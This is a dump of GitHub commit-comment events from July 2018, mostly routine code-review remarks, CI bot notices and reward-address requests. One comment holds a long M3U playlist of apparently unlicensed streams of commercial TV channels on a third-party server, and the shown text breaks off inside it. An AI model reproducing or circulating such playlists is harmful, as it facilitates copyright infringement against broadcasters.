{"id":"7916870030","type":"CommitCommentEvent","actor":{"login":"ybhgenius"},"repo":{"name":"tronprotocol/java-tron"},"payload":{"comment":{"id":29591253,"position":null,"line":null,"path":null,"commit_id":"b61da2998ad8ca94d36610ed52f4bfc409f30b04","created_at":"2018-07-04T08:00:57Z","updated_at":"2018-07-04T08:00:57Z","author_association":"MEMBER","body":"Could you leave me your wallet address and email address？"}},"created_at":"2018-07-04T08:00:57Z"}
{"id":"7916870635","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"PresentKim/Lifetime-PMMP"},"payload":{"comment":{"id":29591254,"position":null,"line":null,"path":null,"commit_id":"6a674f5c05c3d4fadc59cb2787e61f221e027a5f","created_at":"2018-07-04T08:01:04Z","updated_at":"2018-07-04T08:01:04Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, and the build was created with the following warnings:\n\n1. Project already renamed, you may delete the projectId line from .poggit.yml now\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-04T08:01:04Z"}
{"id":"7916870849","type":"CommitCommentEvent","actor":{"login":"vitalytaranov"},"repo":{"name":"gayazovd/eFED2018Sum"},"payload":{"comment":{"id":29591255,"position":37,"line":24,"path":"index.html","commit_id":"5f338265adb3e92e339c9e2430155bd0625d4bbe","created_at":"2018-07-04T08:01:08Z","updated_at":"2018-07-04T08:01:08Z","author_association":"NONE","body":"days, inf, scale – Таких тэгов не существует. Не используй придуманные тэги в дальнейшем. Вместо этого смотри существующие тэги на [w3schools](https://www.w3schools.com/Html/)"}},"created_at":"2018-07-04T08:01:08Z"}
{"id":"7916875989","type":"CommitCommentEvent","actor":{"login":"Hoanglinhnova"},"repo":{"name":"Hoanglinhnova/sanbetong"},"payload":{"comment":{"id":29591270,"position":null,"line":null,"path":null,"commit_id":"0d9f02e14f0afa5903328df0da891f1c121c43ed","created_at":"2018-07-04T08:02:13Z","updated_at":"2018-07-04T08:02:13Z","author_association":"OWNER","body":"https://www.sanbetong.vn"}},"created_at":"2018-07-04T08:02:13Z"}
{"id":"7916878790","type":"CommitCommentEvent","actor":{"login":"ybhgenius"},"repo":{"name":"tronprotocol/java-tron"},"payload":{"comment":{"id":29591275,"position":null,"line":null,"path":null,"commit_id":"b61da2998ad8ca94d36610ed52f4bfc409f30b04","created_at":"2018-07-04T08:02:49Z","updated_at":"2018-07-04T08:02:49Z","author_association":"MEMBER","body":"Wallet address is for reward distributing and my email is yangboheng@tron.network"}},"created_at":"2018-07-04T08:02:49Z"}
{"id":"7916879055","type":"CommitCommentEvent","actor":{"login":"rcaridade145"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29591276,"position":null,"line":null,"path":null,"commit_id":"55b25a4208c453bb5b28cdce634d464c25fb646f","created_at":"2018-07-04T08:02:52Z","updated_at":"2018-07-04T08:02:52Z","author_association":"NONE","body":"@barbudreadmon https://github.com/mamedev/mame/blob/master/src/mame/drivers/naomi.cpp#L2795 It seems that depending on the hardware cabinet and the game the controller schema changes. Looking at mame source one is very similar to dreamcast but the remaining are very different.\r\n\r\n@twinaphex Always interested in everything DC"}},"created_at":"2018-07-04T08:02:52Z"}
{"id":"7916886229","type":"CommitCommentEvent","actor":{"login":"StefanRRichter"},"repo":{"name":"indrc/flink"},"payload":{"comment":{"id":29591286,"position":20,"line":198,"path":"flink-contrib/flink-statebackend-rocksdb/src/main/java/org/apache/flink/contrib/streaming/state/RocksDBStateBackend.java","commit_id":"96def47c57ae58f9717ab35d41e1a4bf6d152851","created_at":"2018-07-04T08:04:23Z","updated_at":"2018-07-04T08:04:23Z","author_association":"NONE","body":"Yes, that would be fine with me. I would introduce it later and refactor before the release."}},"created_at":"2018-07-04T08:04:23Z"}
{"id":"7916886577","type":"CommitCommentEvent","actor":{"login":"malbach"},"repo":{"name":"godotengine/godot"},"payload":{"comment":{"id":29591287,"position":null,"line":null,"path":null,"commit_id":"4739cb8c0003a7c35220ce43d8263df617c6fbe0","created_at":"2018-07-04T08:04:28Z","updated_at":"2018-07-04T08:04:28Z","author_association":"NONE","body":"Hi,\r\nI had to change [line 281](https://github.com/godotengine/godot/commit/4739cb8c0003a7c35220ce43d8263df617c6fbe0#diff-4768530d3a970270f4666afd893c0457R281) in modules/mono/config.py from\r\n```python\r\nreturn LooseVersion(first_line.split()[len('Mono JIT compiler version'.split())])\r\n```\r\nto\r\n```python\r\nreturn LooseVersion(first_line.split()[len('Mono JIT compiler version'.split())].decode('utf-8'))\r\n```\r\nor else I got the error\r\n\r\n> TypeError: cannot use a string pattern on a bytes-like object\r\n\r\nwhen trying to compile.\r\n"}},"created_at":"2018-07-04T08:04:28Z"}
{"id":"7916886819","type":"CommitCommentEvent","actor":{"login":"Damanjeet88"},"repo":{"name":"Damanjeet88/CI_CRUD"},"payload":{"comment":{"id":29591288,"position":null,"line":null,"path":null,"commit_id":"27546e4ef3db97191eeb60b345b1f324fe9bf05d","created_at":"2018-07-04T08:04:30Z","updated_at":"2018-07-04T08:04:30Z","author_association":"OWNER","body":"- FadeIn & FadeOut effect added on Form Success message"}},"created_at":"2018-07-04T08:04:30Z"}
{"id":"7916897108","type":"CommitCommentEvent","actor":{"login":"Morwenn"},"repo":{"name":"boostcon/cppnow_presentations_2018"},"payload":{"comment":{"id":29591303,"position":null,"line":null,"path":null,"commit_id":"5494de34e72e1008bc97c1eca08cfcae32ed4f6b","created_at":"2018-07-04T08:06:40Z","updated_at":"2018-07-04T08:06:40Z","author_association":"NONE","body":"Do I have to mention the link not working because of missed underscore again? ^^'"}},"created_at":"2018-07-04T08:06:40Z"}
{"id":"7916898723","type":"CommitCommentEvent","actor":{"login":"Ivan1997123"},"repo":{"name":"al177/hc12pj"},"payload":{"comment":{"id":29591304,"position":null,"line":null,"path":null,"commit_id":"071d1b74b31eda43b25e0c1f84b9c4befbb22f3d","created_at":"2018-07-04T08:07:00Z","updated_at":"2018-07-04T08:07:00Z","author_association":"NONE","body":"I can't run this project in STVD using cosmic compiler c. Please help me."}},"created_at":"2018-07-04T08:07:00Z"}
{"id":"7916898804","type":"CommitCommentEvent","actor":{"login":"commdevbwpp"},"repo":{"name":"commdevbwpp/Greenfair"},"payload":{"comment":{"id":29591305,"position":null,"line":null,"path":null,"commit_id":"e11e326ce45731356de36afbd5bea119af10cf69","created_at":"2018-07-04T08:07:01Z","updated_at":"2018-07-04T08:07:01Z","author_association":"OWNER","body":"These changes need to be re-design again and will do again"}},"created_at":"2018-07-04T08:07:01Z"}
{"id":"7916899846","type":"CommitCommentEvent","actor":{"login":"jelsner"},"repo":{"name":"jelsner/tor-clusters"},"payload":{"comment":{"id":29591306,"position":null,"line":null,"path":null,"commit_id":"11d2abcfaaa2d93cfbf6d4961a7edbddb545c844","created_at":"2018-07-04T08:07:14Z","updated_at":"2018-07-04T08:07:14Z","author_association":"OWNER","body":"Why was there no data in certain geometries? Did you use data before 1994?  I commented your lines since I was not getting this error."}},"created_at":"2018-07-04T08:07:14Z"}
{"id":"7916900286","type":"CommitCommentEvent","actor":{"login":"StefanRRichter"},"repo":{"name":"indrc/flink"},"payload":{"comment":{"id":29591307,"position":null,"line":null,"path":null,"commit_id":"96def47c57ae58f9717ab35d41e1a4bf6d152851","created_at":"2018-07-04T08:07:20Z","updated_at":"2018-07-04T08:07:20Z","author_association":"NONE","body":"I think if S3 enforces this requirement to make this work, then there is little else we can do. It will just become a bit harder in this case to run ops task like \"drop all checkpoints for a job\", but as I consider this work more of a power user feature, that might be ok. Could add a hint in the docs about this potential downside."}},"created_at":"2018-07-04T08:07:20Z"}
{"id":"7916902268","type":"CommitCommentEvent","actor":{"login":"HuohuoZhang"},"repo":{"name":"HuohuoZhang/finalweb"},"payload":{"comment":{"id":29591316,"position":null,"line":null,"path":null,"commit_id":"4585521fc72c4653a552fbcee1859e9d26c2e8ee","created_at":"2018-07-04T08:07:43Z","updated_at":"2018-07-04T08:07:43Z","author_association":"OWNER","body":"node main"}},"created_at":"2018-07-04T08:07:43Z"}
{"id":"7916902708","type":"CommitCommentEvent","actor":{"login":"ybhgenius"},"repo":{"name":"tronprotocol/java-tron"},"payload":{"comment":{"id":29591317,"position":null,"line":null,"path":null,"commit_id":"61020c08238240b8713b8f586ec159741659abce","created_at":"2018-07-04T08:07:49Z","updated_at":"2018-07-04T08:07:49Z","author_association":"MEMBER","body":"Could you leave me your wallet address for sending reward and email address? Please send your information to yangboheng@tron.network."}},"created_at":"2018-07-04T08:07:49Z"}
{"id":"7916903245","type":"CommitCommentEvent","actor":{"login":"HuohuoZhang"},"repo":{"name":"HuohuoZhang/finalweb"},"payload":{"comment":{"id":29591318,"position":1,"line":1,"path":"README.md","commit_id":"4585521fc72c4653a552fbcee1859e9d26c2e8ee","created_at":"2018-07-04T08:07:55Z","updated_at":"2018-07-04T08:07:55Z","author_association":"OWNER","body":"node main"}},"created_at":"2018-07-04T08:07:55Z"}
{"id":"7916904058","type":"CommitCommentEvent","actor":{"login":"hazwan90"},"repo":{"name":"web-platform-tests/wpt"},"payload":{"comment":{"id":29591320,"position":null,"line":null,"path":null,"commit_id":"e3173905464f0afb36163fa271ff01957eedec7c","created_at":"2018-07-04T08:08:05Z","updated_at":"2018-07-04T08:08:05Z","author_association":"NONE","body":"https://github.com/web-platform-tests/wpt/commit/e3173905464f0afb36163fa271ff01957eedec7c#diff-b8078d1633cd81c104477fe4869bdfb3"}},"created_at":"2018-07-04T08:08:05Z"}
{"id":"7916905706","type":"CommitCommentEvent","actor":{"login":"pei-han"},"repo":{"name":"didilinkin/react-admin-antd"},"payload":{"comment":{"id":29591322,"position":24,"line":24,"path":"src/api/index.js","commit_id":"b06efac02e1a18496aa2f9e4c679acc8b58b556d","created_at":"2018-07-04T08:08:26Z","updated_at":"2018-07-04T08:08:26Z","author_association":"CONTRIBUTOR","body":"await + promise的组合是否在此试用？\r\n如果只是为了不用回调，异步操作变成同步的形式，是否有别的方式？"}},"created_at":"2018-07-04T08:08:26Z"}
{"id":"7916908171","type":"CommitCommentEvent","actor":{"login":"andrerom"},"repo":{"name":"ezsystems/ezplatform-cron"},"payload":{"comment":{"id":29591324,"position":17,"line":28,"path":"composer.json","commit_id":"40fed0d16270d002f1edf578f82e56498c5914da","created_at":"2018-07-04T08:08:58Z","updated_at":"2018-07-04T08:08:58Z","author_association":"MEMBER","body":"@webhdx / @lserwatka  Any insight on why  you added symfony here and restrict it to 3.x? until that change the bundle also worked for 1.x afaik. Context: asking in regards to doc teams effort to document recommended bundles."}},"created_at":"2018-07-04T08:08:58Z"}
{"id":"7916913372","type":"CommitCommentEvent","actor":{"login":"damn1"},"repo":{"name":"robotology/yarp"},"payload":{"comment":{"id":29591331,"position":null,"line":null,"path":null,"commit_id":"fa48b6efdc8516c50555becf5debabbbbd8bfab5","created_at":"2018-07-04T08:10:07Z","updated_at":"2018-07-04T08:10:07Z","author_association":"CONTRIBUTOR","body":"Unfortunately this is not the first time I see this kind of conversion so I think there may be others"}},"created_at":"2018-07-04T08:10:07Z"}
{"id":"7916915755","type":"CommitCommentEvent","actor":{"login":"onursenture"},"repo":{"name":"primefaces/primereact"},"payload":{"comment":{"id":29591334,"position":5,"line":478,"path":"src/sass/App.scss","commit_id":"8edd40ba21cd25b5c4251a5ae5e021b1a84833c5","created_at":"2018-07-04T08:10:36Z","updated_at":"2018-07-04T08:10:36Z","author_association":"MEMBER","body":"Can also be \"rgba(110, 221, 251, 0.3)\""}},"created_at":"2018-07-04T08:10:36Z"}
{"id":"7916916950","type":"CommitCommentEvent","actor":{"login":"MunifTanjim"},"repo":{"name":"MunifTanjim/minimo"},"payload":{"comment":{"id":29591335,"position":23,"line":123,"path":"exampleSite/content/docs/comments-support.md","commit_id":"4f6e0e9fe8843faa78f602b128f7c8beab2f9c94","created_at":"2018-07-04T08:10:52Z","updated_at":"2018-07-04T08:10:52Z","author_association":"OWNER","body":"Got it. I'll update the docs."}},"created_at":"2018-07-04T08:10:52Z"}
{"id":"7916918615","type":"CommitCommentEvent","actor":{"login":"ybhgenius"},"repo":{"name":"tronprotocol/wiki"},"payload":{"comment":{"id":29591337,"position":null,"line":null,"path":null,"commit_id":"92ed648a32056e2f9e8bb9aaba161d11f8736906","created_at":"2018-07-04T08:11:14Z","updated_at":"2018-07-04T08:11:14Z","author_association":"MEMBER","body":"Could you send me your wallet address and email address? For reward sending. My email address is yangboheng@tron.network."}},"created_at":"2018-07-04T08:11:14Z"}
{"id":"7916920873","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimExchange"},"payload":{"comment":{"id":29591342,"position":null,"line":null,"path":null,"commit_id":"908b0dd0d2ac4332c74ccf0f4a792afd3fe2ad11","created_at":"2018-07-04T08:11:42Z","updated_at":"2018-07-04T08:11:42Z","author_association":"CONTRIBUTOR","body":"TeamCity Xbim :: Xbim Exchange :: XbimExchange [Build 46](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1922&buildTypeId=Xbim_XbimExchange_XbimExchange) is now running\n"}},"created_at":"2018-07-04T08:11:42Z"}
{"id":"7916925249","type":"CommitCommentEvent","actor":{"login":"pedrooste"},"repo":{"name":"AuroraCollege2018PSDD/at2-hangman-project-team-better-than-all-the-other-groups"},"payload":{"comment":{"id":29591349,"position":null,"line":null,"path":null,"commit_id":"1d8f3ab39494d2f5ca95423a8f7c807379798f53","created_at":"2018-07-04T08:12:35Z","updated_at":"2018-07-04T08:12:35Z","author_association":"NONE","body":"some solid words"}},"created_at":"2018-07-04T08:12:35Z"}
{"id":"7916925652","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimExchange"},"payload":{"comment":{"id":29591350,"position":null,"line":null,"path":null,"commit_id":"908b0dd0d2ac4332c74ccf0f4a792afd3fe2ad11","created_at":"2018-07-04T08:12:40Z","updated_at":"2018-07-04T08:12:40Z","author_association":"CONTRIBUTOR","body":"TeamCity Xbim :: Xbim Exchange :: XbimExchange [Build 46](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1922&buildTypeId=Xbim_XbimExchange_XbimExchange) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 00:00:58"}},"created_at":"2018-07-04T08:12:40Z"}
{"id":"7916932462","type":"CommitCommentEvent","actor":{"login":"ybhgenius"},"repo":{"name":"tronprotocol/wiki"},"payload":{"comment":{"id":29591358,"position":null,"line":null,"path":null,"commit_id":"7021a44673b57c789cc6f2ef45d98109987d408c","created_at":"2018-07-04T08:14:07Z","updated_at":"2018-07-04T08:14:07Z","author_association":"MEMBER","body":"Could you send me your wallet address and email address? For reward sending. My email address is yangboheng@tron.network."}},"created_at":"2018-07-04T08:14:07Z"}
{"id":"7916936738","type":"CommitCommentEvent","actor":{"login":"aben20807"},"repo":{"name":"YI-LING-BA-JI-JHUAN-TI-SHENG/project"},"payload":{"comment":{"id":29591367,"position":null,"line":null,"path":null,"commit_id":"fe1dcba3a9cdf582ded07a24c5d3961f4abd3ea5","created_at":"2018-07-04T08:15:01Z","updated_at":"2018-07-04T08:15:01Z","author_association":"CONTRIBUTOR","body":"#1 "}},"created_at":"2018-07-04T08:15:01Z"}
{"id":"7916938909","type":"CommitCommentEvent","actor":{"login":"barbudreadmon"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29591374,"position":null,"line":null,"path":null,"commit_id":"55b25a4208c453bb5b28cdce634d464c25fb646f","created_at":"2018-07-04T08:15:27Z","updated_at":"2018-07-04T08:15:27Z","author_association":"NONE","body":"@twinaphex @rcaridade145 Let's continue the discussion there : https://github.com/libretro/reicast-emulator/issues/115"}},"created_at":"2018-07-04T08:15:27Z"}
{"id":"7916941529","type":"CommitCommentEvent","actor":{"login":"nafg"},"repo":{"name":"AndrianBdn/nginx-auto-acme"},"payload":{"comment":{"id":29591384,"position":142,"line":142,"path":"keeper.py","commit_id":"7e24c079b88b052482eac50b7f512d920b884692","created_at":"2018-07-04T08:15:59Z","updated_at":"2018-07-04T08:15:59Z","author_association":"NONE","body":"should that be `if tls_config is None`?"}},"created_at":"2018-07-04T08:15:59Z"}
{"id":"7916953960","type":"CommitCommentEvent","actor":{"login":"dev-101"},"repo":{"name":"osclass/Osclass"},"payload":{"comment":{"id":29591402,"position":null,"line":null,"path":null,"commit_id":"4f9d3288e1e33b3a45191bebf45858834b96f29a","created_at":"2018-07-04T08:18:37Z","updated_at":"2018-07-04T08:18:37Z","author_association":"CONTRIBUTOR","body":"@garciademarina we should no longer use **ImageResizer** class as it was renamed to **ImageProcessing** in 3.7.3"}},"created_at":"2018-07-04T08:18:37Z"}
{"id":"7916956373","type":"CommitCommentEvent","actor":{"login":"keiranmraine"},"repo":{"name":"elsiklab/multibigwig"},"payload":{"comment":{"id":29591408,"position":null,"line":null,"path":null,"commit_id":"4eb13ad6c2fca61f2bb32b0e1500641631b3545a","created_at":"2018-07-04T08:19:08Z","updated_at":"2018-07-04T08:19:08Z","author_association":"CONTRIBUTOR","body":"@cmdcolin is this backwards compatible?"}},"created_at":"2018-07-04T08:19:08Z"}
{"id":"7916959444","type":"CommitCommentEvent","actor":{"login":"olyv"},"repo":{"name":"serenity-bdd/serenity-cucumber-starter"},"payload":{"comment":{"id":29591415,"position":30,"line":30,"path":"pom.xml","commit_id":"cf29c756f3bf73470805f77e1a56b83c3cebb505","created_at":"2018-07-04T08:19:45Z","updated_at":"2018-07-04T08:19:45Z","author_association":"NONE","body":"may I ask why there is jcenter but not maven central repository? Is Gradle usage the only reason for this?"}},"created_at":"2018-07-04T08:19:45Z"}
{"id":"7916963782","type":"CommitCommentEvent","actor":{"login":"ppclive"},"repo":{"name":"ppclive/ppciptv"},"payload":{"comment":{"id":29591422,"position":null,"line":null,"path":null,"commit_id":"f0f12f1903031ba2cf15854e377d2d8749c6a404","created_at":"2018-07-04T08:20:38Z","updated_at":"2018-07-04T08:20:38Z","author_association":"OWNER","body":"#EXTM3U\r\n#EXTINF:-1,CAN: CP24\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9347.ts\r\n#EXTINF:-1,CAN: CRIME INVESTIGATION\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9346.ts\r\n#EXTINF:-1,CAN: DISCOVERY CHANNEL\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9344.ts\r\n#EXTINF:-1,CAN: DISCOVERY SCIENCE\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9343.ts\r\n#EXTINF:-1,CAN: FAMILY WEST\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9341.ts\r\n#EXTINF:-1,CAN: FIGHT NETWORK\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9340.ts\r\n#EXTINF:-1,CAN: BRAVO\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9348.ts\r\n#EXTINF:-1,CAN: FOX-W\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9339.ts\r\n#EXTINF:-1,CAN: GAME TV\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9337.ts\r\n#EXTINF:-1,CAN: Hallmark\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9361.ts\r\n#EXTINF:-1,CAN: HBO\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9336.ts\r\n#EXTINF:-1,CAN: HBO 2\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9335.ts\r\n#EXTINF:-1,CAN: NBC EAST\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9324.ts\r\n#EXTINF:-1,CAN: PBS-W\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9334.ts\r\n#EXTINF:-1,CAN: SHOWTIME\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9332.ts\r\n#EXTINF:-1,CAN: TELETOON EAST\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9330.ts\r\n#EXTINF:-1,CAN: TLC\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9331.ts\r\n#EXTINF:-1,CAN: TRAVEL AND ESCAPE\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9329.ts\r\n#EXTINF:-1,CAN: WSBK\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9327.ts\r\n#EXTINF:-1,CAN: CTV\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9345.ts\r\n#EXTINF:-1,CAN: PEACH TREE TV\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9333.ts\r\n#EXTINF:-1,CAN: TREEHOUSE TV\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9328.ts\r\n#EXTINF:-1,CAN: YES\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9326.ts\r\n#EXTINF:-1,CAN: YTV-E\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9325.ts\r\n#EXTINF:-1,CAN: ABC EAST\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9932.ts\r\n#EXTINF:-1,CAN: ABC SPARK CANADA\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9844.ts\r\n#EXTINF:-1,CAN: ABC WEST\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9988.ts\r\n#EXTINF:-1,CAN: ACTION\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9889.ts\r\n#EXTINF:-1,CAN: ADDIK TV\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9888.ts\r\n#EXTINF:-1,CAN: AHC\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9832.ts\r\n#EXTINF:-1,CAN: AMC\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9987.ts\r\n#EXTINF:-1,CAN: ANIMAL PLANET\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9986.ts\r\n#EXTINF:-1,CAN: APTN\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9887.ts\r\n#EXTINF:-1,CAN: ARTV\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9886.ts\r\n#EXTINF:-1,CAN: BBC CANADA\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9885.ts\r\n#EXTINF:-1,CAN: BBC KIDS\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9884.ts\r\n#EXTINF:-1,CAN: BBC WORLD NEWS\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9931.ts\r\n#EXTINF:-1,CAN: BET\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9930.ts\r\n#EXTINF:-1,CAN: BNN\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9883.ts\r\n#EXTINF:-1,CAN: BOOK TV\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9929.ts\r\n#EXTINF:-1,CAN: CANAL D\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9910.ts\r\n#EXTINF:-1,CAN: CANAL SAVOIR\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9985.ts\r\n#EXTINF:-1,CAN: CARTOON NETWORK\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9928.ts\r\n#EXTINF:-1,CAN: CASA\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9984.ts\r\n#EXTINF:-1,CAN: CBC MONTREAL\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9831.ts\r\n#EXTINF:-1,CAN: CBC NEWS\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9927.ts\r\n#EXTINF:-1,CAN: CBC OTTAWA\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9882.ts\r\n#EXTINF:-1,CAN: CBC TORONTO\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9983.ts\r\n#EXTINF:-1,CAN: CBC VANCOUVER\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9881.ts\r\n#EXTINF:-1,CAN: CBS EAST\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9880.ts\r\n#EXTINF:-1,CAN: CBS WEST\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9879.ts\r\n#EXTINF:-1,CAN: CHCH\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9982.ts\r\n#EXTINF:-1,CAN: CINEPOP\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9878.ts\r\n#EXTINF:-1,CAN: CITY TORONTO\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9877.ts\r\n#EXTINF:-1,CAN: CITY VANCOUVER\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9909.ts\r\n#EXTINF:-1,CAN: CMT CANADA\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9926.ts\r\n#EXTINF:-1,CAN: CNBC\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9876.ts\r\n#EXTINF:-1,CAN: CNN\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9981.ts\r\n#EXTINF:-1,CAN: CNN INTERNATIONAL\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9875.ts\r\n#EXTINF:-1,CAN: COMEDY EAST\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9830.ts\r\n#EXTINF:-1,CAN: COMEDY GOLD\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9980.ts\r\n#EXTINF:-1,CAN: COOKING CHANNEL\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9979.ts\r\n#EXTINF:-1,CAN: COSMO\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9925.ts\r\n#EXTINF:-1,CAN: COTTAGE LIFE\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9924.ts\r\n#EXTINF:-1,CAN: CPAC\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9978.ts\r\n#EXTINF:-1,CAN: CPAC FRENCH\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9977.ts\r\n#EXTINF:-1,CAN: CTV 2 VANCOUVER\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9976.ts\r\n#EXTINF:-1,CAN: CTV NEWS NETWORK\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9975.ts\r\n#EXTINF:-1,CAN: CTV OTTAWA\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9974.ts\r\n#EXTINF:-1,CAN: CTV VANCOUVER\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9814.ts\r\n#EXTINF:-1,CAN: CTV2 OTTAWA\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9829.ts\r\n#EXTINF:-1,CAN: CW 11\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9973.ts\r\n#EXTINF:-1,CAN: DAYSTAR TV\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9972.ts\r\n#EXTINF:-1,CAN: DEJAVIEW\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9923.ts\r\n#EXTINF:-1,CAN: DISCOVERY SCIENCE USA\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9847.ts\r\n#EXTINF:-1,CAN: DISCOVERY VELOCITY\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9845.ts\r\n#EXTINF:-1,CAN: DISNEY\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9843.ts\r\n#EXTINF:-1,CAN: DISNEY CANADA\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9828.ts\r\n#EXTINF:-1,CAN: DISNEY FRENCH\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9971.ts\r\n#EXTINF:-1,CAN: DISNEY JR\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9836.ts\r\n#EXTINF:-1,CAN: DIY\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9874.ts\r\n#EXTINF:-1,CAN: DOCUMENTARY\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9922.ts\r\n#EXTINF:-1,CAN: DTOUR\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9970.ts\r\n#EXTINF:-1,CAN: E!ntertenment\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9827.ts\r\n#EXTINF:-1,CAN: ENCORE 1 EAST\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9969.ts\r\n#EXTINF:-1,CAN: ENCORE 2 EAST\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9869.ts\r\n#EXTINF:-1,CAN: FAMILY CHRGD\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9873.ts\r\n#EXTINF:-1,CAN: FAMILY EAST\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9835.ts\r\n#EXTINF:-1,CAN: FOOD NETWORK\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9968.ts\r\n#EXTINF:-1,CAN: FOX EAST\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9868.ts\r\n#EXTINF:-1,CAN: FOX NEWS\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9967.ts\r\n#EXTINF:-1,CAN: FRISIN\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9840.ts\r\n#EXTINF:-1,CAN: FTV CANADA\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9867.ts\r\n#EXTINF:-1,CAN: FX 